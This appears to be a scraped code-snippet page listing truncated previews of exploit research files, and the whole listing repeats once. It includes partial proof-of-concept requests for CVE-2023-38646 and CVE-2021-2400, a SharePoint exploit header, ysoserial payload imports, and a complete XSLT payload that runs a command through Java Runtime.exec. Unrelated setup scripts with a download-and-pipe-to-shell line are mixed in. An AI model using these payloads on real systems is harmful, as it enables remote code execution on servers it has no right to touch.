testanull

## prepare_ubuntu_template.sh
# All commands will be executed on a Proxmox host
sudo apt update -y && sudo apt install libguestfs-tools -y
wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img
# Install qemu-guest-agent on the image. Additional packages can be specified by separating with a comma.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --install qemu-guest-agent
# Read and set root user password from file.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --root-password file:password_root.txt
# Create an additional user.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --run-command "useradd -m -s /bin/bash myuser"
# Set password for that user.

## SharePwn_public.py
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯

## install.sh
#!/bin/bash
sudo su
wget -qO- https://get.docker.com/ | sh
COMPOSE_VERSION=`git ls-remote https://github.com/docker/compose | grep refs/tags | grep -oE "[0-9]+\.[0-9][0-9]+\.[0-9]+$" | sort --version-sort | tail -n 2 | head -n 1`
sudo sh -c "curl -L https://github.com/docker/compose/releases/download/v${COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose"
sudo chmod +x /usr/local/bin/docker-compose

# You're good to go, no more 404 not found!

## cve-2023-38646_poc.txt
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Connection: close

{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
"subprotocol":"h2",

## parse_ntlm.py
def parseNtlmMsg(msg):
	def decode_int(byte_string):
		return int(byte_string[::-1].encode('hex'), 16)

	def decode_string(byte_string):
		return byte_string.replace('\x00', '')

	target_info_fields  = msg[40:48]
	target_info_len     = decode_int(target_info_fields[0:2])
	target_info_offset  = decode_int(target_info_fields[4:8])

## select.xslt
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="&lt;init&gt;"/>

## asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):

## PoC_CVE-2021-2400.txt
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: 192.168.139.212
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 1317

<?xml version="1.0"?>
<soap-env:Envelope

## JavaCharStream.java
public class JavaCharStream
{
public char readChar() throws java.io.IOException
  {
   //truncated
              if ((buffer[bufpos] = c = ReadByte()) != '\\')
              {
                 UpdateLineColumn(c);
                 // found a non-backslash char.
                 if ((c == 'u') && ((backSlashCnt & 1) == 1))

## TomcatEchoInjectOpenAM.java
package ysoserial.payloads;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.connector.Response;
import org.apache.catalina.connector.ResponseFacade;
import org.apache.catalina.core.ApplicationFilterChain;
	# All commands will be executed on a Proxmox host
	sudo apt update -y && sudo apt install libguestfs-tools -y
	wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img
	# Install qemu-guest-agent on the image. Additional packages can be specified by separating with a comma.
	sudo virt-customize -a jammy-server-cloudimg-amd64.img --install qemu-guest-agent
	# Read and set root user password from file.
	sudo virt-customize -a jammy-server-cloudimg-amd64.img --root-password file:password_root.txt
	# Create an additional user.
	sudo virt-customize -a jammy-server-cloudimg-amd64.img --run-command "useradd -m -s /bin/bash myuser"
	# Set password for that user.
	# -- coding: utf-8 --
	import hashlib
	import base64
	import requests, string, struct, uuid, random, re
	import sys
	from collections import OrderedDict
	from sys import version
	from urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
	#!/bin/bash
	sudo su
	wget -qO- https://get.docker.com/ \| sh
	COMPOSE_VERSION=`git ls-remote https://github.com/docker/compose \| grep refs/tags \| grep -oE "[0-9]+\.[0-9][0-9]+\.[0-9]+$" \| sort --version-sort \| tail -n 2 \| head -n 1`
	sudo sh -c "curl -L https://github.com/docker/compose/releases/download/v${COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose"
	sudo chmod +x /usr/local/bin/docker-compose

	# You're good to go, no more 404 not found!
	POST /api/setup/validate HTTP/1.1
	Host: localhost:3000
	Content-Length: 416
	Accept: application/json
	Content-Type: application/json
	User-Agent: Mozilla/5.0
	Connection: close

	{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
	"subprotocol":"h2",
	def parseNtlmMsg(msg):
	def decode_int(byte_string):
	return int(byte_string[::-1].encode('hex'), 16)

	def decode_string(byte_string):
	return byte_string.replace('\x00', '')

	target_info_fields = msg[40:48]
	target_info_len = decode_int(target_info_fields[0:2])
	target_info_offset = decode_int(target_info_fields[4:8])
	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
	<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="<init>"/>
	import requests
	import random
	import string
	import sys
	import time
	import requests
	import urllib3
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

	def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
	POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
	Host: 192.168.139.212
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
	Connection: close
	Upgrade-Insecure-Requests: 1
	Content-Type: text/xml
	Content-Length: 1317

	<?xml version="1.0"?>
	<soap-env:Envelope
	public class JavaCharStream
	{
	public char readChar() throws java.io.IOException
	{
	//truncated
	if ((buffer[bufpos] = c = ReadByte()) != '\\')
	{
	UpdateLineColumn(c);
	// found a non-backslash char.
	if ((c == 'u') && ((backSlashCnt & 1) == 1))
	package ysoserial.payloads;

	import com.sun.org.apache.xalan.internal.xsltc.DOM;
	import com.sun.org.apache.xalan.internal.xsltc.TransletException;
	import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
	import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
	import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
	import org.apache.catalina.connector.Response;
	import org.apache.catalina.connector.ResponseFacade;
	import org.apache.catalina.core.ApplicationFilterChain;